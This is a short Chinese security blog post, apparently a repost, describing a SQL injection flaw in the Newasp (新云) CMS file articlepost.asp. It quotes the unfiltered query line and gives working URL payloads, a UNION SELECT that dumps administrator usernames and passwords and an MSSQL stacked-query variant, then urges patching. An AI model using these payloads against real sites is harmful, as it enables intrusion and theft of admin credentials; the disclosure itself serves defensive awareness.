新云网站管理系统articlepost.asp文件注入漏洞 's

admin 2017年4月18日17:37:54评论296 views字数 609阅读2分1秒阅读模式
摘要

来自:守护天使's bloguser/articlepost.asp文件第333行。
代码如下
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And username='" & Newasp.MemberName & "' And ArticleID=" & Request("ArticleID")
Request("ArticleID")直接就放到查询语句里面了。
看上下的代码,没有任何过滤。只有用户是否有权限发文章的检查。
OK,然后就综合上下文的代码,可以构造语句。
articlepost.asp?ChannelID=1&action=view& ArticleID=1%20union%20select%201,2,3,4,5,username,password,8,9%20from%20nc_admin
注册后直接在浏览器上输入这个语句,就可以爆出管理员的表和代码。
如果是MSSQL的。articlepost.asp?ChannelID=1&action=view&ArticleID=1;–是可以直接利用的。

来自:守护天使's blog

user/articlepost.asp文件第333行。
代码如下
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And username='" & Newasp.MemberName & "' And ArticleID=" & Request("ArticleID")
Request("ArticleID")直接就放到查询语句里面了。
看上下的代码,没有任何过滤。只有用户是否有权限发文章的检查。
OK,然后就综合上下文的代码,可以构造语句。
articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%201,2,3,4,5,username,password,8,9%20from%20nc_admin
注册后直接在浏览器上输入这个语句,就可以爆出管理员的表和代码。
如果是MSSQL的。articlepost.asp?ChannelID=1&action=view&ArticleID=1;–是可以直接利用的。

另外在同文件夹下的softpost.asp文件存在类似的问题。所以,请大家及时修补漏洞。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月18日17:37:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   新云网站管理系统articlepost.asp文件注入漏洞 'shttps://cn-sec.com/archives/48907.html

发表评论

匿名网友 填写信息